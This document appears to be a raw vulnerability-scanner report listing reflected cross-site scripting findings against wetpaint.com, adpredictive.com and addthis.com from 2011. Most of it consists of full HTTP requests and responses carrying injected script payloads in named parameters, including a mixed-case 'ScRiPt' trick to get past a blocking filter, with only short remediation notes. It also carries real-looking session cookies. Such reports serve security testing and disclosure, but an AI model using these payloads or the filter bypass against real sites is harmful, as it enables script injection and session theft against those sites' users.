GET /scripts/wpcss/skin/meadowgreen8cc9a<img%20src%3da%20onerror%3dalert(1)>1b1cc5a4bc5/s.css?20110120041852 HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:00:20 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=1EF4A790692B899F9F7BAFD81DBBB10D; Path=/ Cache-Control: max-age=2592000 Expires: Mon, 07 Mar 2011 16:00:20 GMT Vary: Accept-Encoding Content-Type: text/css;charset=UTF-8 Content-Length: 4350
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c807d<img%20src%3da%20onerror%3dalert(1)>89bbccc59db was submitted in the REST URL parameter 3. This input was echoed as c807d<img src=a onerror=alert(1)>89bbccc59db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /scripts/wpjsPage/pagec807d<img%20src%3da%20onerror%3dalert(1)>89bbccc59db/p.js?v=20110120041852 HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=F6E1F8144EB4CA5D1686E51986AC76AA; wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:38 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=0B6E0BAD75294417BE18C8FE72F24144; Path=/ Cache-Control: max-age=2592000 Expires: Mon, 07 Mar 2011 15:59:38 GMT Vary: Accept-Encoding Content-Type: text/javascript;charset=ISO-8859-1 Content-Length: 103
The requested resource (/js/pages/pagec807d<img src=a onerror=alert(1)>89bbccc59db.js) is not available
The value of the memberData request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3910</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>b4e740388f2 was submitted in the memberData parameter. This input was echoed as e3910</ScRiPt ><ScRiPt>alert(1)</ScRiPt>b4e740388f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-e3910</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>b4e740388f2&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:48 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=F2E506E6F40E7272E29FB7C4E180C4EC; Path=/ Content-Length: 2310 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 15:59:48 GMT Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
...[SNIP]... ); //required since an iframe's referrer is not the same as the parent page's globalGaTracker._setDomainName( rootDomain ); globalGaTracker._setCustomVar(1,"MemberData",'N__anonymous__-__-e3910</ScRiPt ><ScRiPt>alert(1)</ScRiPt>b4e740388f2',1); //globalGaTracker._setCustomVar(2,"Contribution",[contributionCounter],1) globalGaTracker._setCustomVar(3,"MultiSiteVisits",1,2); globalGaTracker._setCustomVar(4,"S ...[SNIP]...
The value of the pageType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c9b2"%3balert(1)//6628d3ad43d was submitted in the pageType parameter. This input was echoed as 6c9b2";alert(1)//6628d3ad43d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage6c9b2"%3balert(1)//6628d3ad43d&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:51 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=220715F4738F4E6735C191E62267FD6E; Path=/ Content-Length: 2236 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 15:59:51 GMT Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe633'%3balert(1)//6bf50d8f015 was submitted in the ref parameter. This input was echoed as fe633';alert(1)//6bf50d8f015 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=fe633'%3balert(1)//6bf50d8f015&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:53 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=32604A57F6152A669FC5F4E4513C5645; Path=/ Content-Length: 2264 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 15:59:53 GMT Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
globalGaTracker._setReferrerOverride('fe633';alert(1)//6bf50d8f015'); //required since an iframe's referrer is not the same as the parent page's globalGaTracker._setDomainName( rootDomain ); globalGaTracker._setCustomVar(1,"MemberData",'N__anonymous__-__ ...[SNIP]...
The value of the segmentProfile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6811c'%3balert(1)//93742b54adf was submitted in the segmentProfile parameter. This input was echoed as 6811c';alert(1)//93742b54adf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-106811c'%3balert(1)//93742b54adf&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:44 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=BD560CBA29D5FF2BCD7C9BBADEAE5064; Path=/ Content-Length: 2235 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 15:59:44 GMT Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
adChannelGaTracker._setReferrerOverride(''); //required since an iframe's referrer is not the same as the parent page's adChannelGaTracker._setDomainName(rootDomain); adChannel ...[SNIP]...
The value of the siteCat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f59d8'%3balert(1)//f17e3fe8edb was submitted in the siteCat parameter. This input was echoed as f59d8';alert(1)//f17e3fe8edb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technologyf59d8'%3balert(1)//f17e3fe8edb&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:51 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=FE6F1B1277DF20F3DAF73CAFC657E9B3; Path=/ Content-Length: 2269 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 15:59:51 GMT Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
The value of the siteName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 779b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>41504730d2c was submitted in the siteName parameter. This input was echoed as 779b5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>41504730d2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki779b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>41504730d2c&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:51 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=DA229296C73FE646FDCCE50BBF755E20; Path=/ Content-Length: 2310 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 15:59:51 GMT Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
The value of the sitesCount request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3b06f%3balert(1)//2503310a12c was submitted in the sitesCount parameter. This input was echoed as 3b06f;alert(1)//2503310a12c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=13b06f%3balert(1)//2503310a12c&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:52 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=E1FCA5C2375BFF42E571DC325636DE6B; Path=/ Content-Length: 2261 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 15:59:52 GMT Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
...[SNIP]... setCustomVar(1,"MemberData",'N__anonymous__-__-',1); //globalGaTracker._setCustomVar(2,"Contribution",[contributionCounter],1) globalGaTracker._setCustomVar(3,"MultiSiteVisits",13b06f;alert(1)//2503310a12c,2); globalGaTracker._setCustomVar(4,"SiteName",'htcwiki',3); globalGaTracker._setCustomVar(5,"Category",'Technology',3); globalGaTracker._trackPageview("/homePage"); } ca ...[SNIP]...
The value of the title request parameter is copied into the HTML document as text between TITLE tags. The payload 1ace3</title><script>alert(1)</script>ae207730a4d was submitted in the title parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki1ace3</title><script>alert(1)</script>ae207730a4d&url=%2F HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:53 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=CE120C471FB90B16FE35CF6CDEA6164D; Path=/ Content-Length: 2257 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 15:59:53 GMT Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki1ace3</title><script>alert(1)</script>ae207730a4d</title> ...[SNIP]...
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 267a4"%3balert(1)//ec0110e87b was submitted in the url parameter. This input was echoed as 267a4";alert(1)//ec0110e87b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /staticComponent/iframe/track?segmentProfile=UA-11780962-10&memberData=N__anonymous__-__-&siteName=htcwiki&siteCat=Technology&pageType=homePage&sitesCount=1&ref=&title=HTC%20Smartphone%20Wiki%20-%20HTC%20Smartphone%20Wiki&url=%2F267a4"%3balert(1)//ec0110e87b HTTP/1.1 Host: static.wetpaint.com Proxy-Connection: keep-alive Referer: http://htcwiki.wetpaint.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wptrk=sn=htcwiki&i=1; wpptrk=gpvc=1&ab=0; wpptrk2d=coppa=; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; JSESSIONID=956F18C232DBECC441563E260EB0D6EE
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:59:53 GMT Server: Apache P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT Set-Cookie: JSESSIONID=8EF5AF1534C8D16594D2F61F4FAA440D; Path=/ Content-Length: 2235 Cache-Control: max-age=0 Expires: Sat, 05 Feb 2011 15:59:53 GMT Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>HTC Smartphone Wiki - HTC Smartphone Wiki</title> </head> <body>
The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 646be'%3balert(1)//7deaafb62b9 was submitted in the admeld_adprovider_id parameter. This input was echoed as 646be';alert(1)//7deaafb62b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /amumatch?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=492646be'%3balert(1)//7deaafb62b9&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1 Host: um.adpredictive.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac9c7'%3balert(1)//432447c0514 was submitted in the admeld_callback parameter. This input was echoed as ac9c7';alert(1)//432447c0514 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /amumatch?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=492&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchac9c7'%3balert(1)//432447c0514 HTTP/1.1 Host: um.adpredictive.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/297/wetpaintv1/728x90/technology-atf?t=1296921573354&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fhtcwiki.wetpaint.com%2F&refer= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92343"-alert(1)-"ebb68879ffc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php92343"-alert(1)-"ebb68879ffc HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 15:52:46 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=if2gvf5uvdh7v1a1320leacm11; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1497 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php92343"-alert(1)-"ebb68879ffc"; if (typeof utmx != "undefined" && utmx('combination') != undefined) { u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination'); } if (window._gat) { var gaPageTracker = _gat._get ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7efed<script>alert(1)</script>ee0d16265bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.php7efed<script>alert(1)</script>ee0d16265bf HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Sat, 05 Feb 2011 15:52:46 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=cs8kb2m53v021g3mbm8btac024; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1523 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
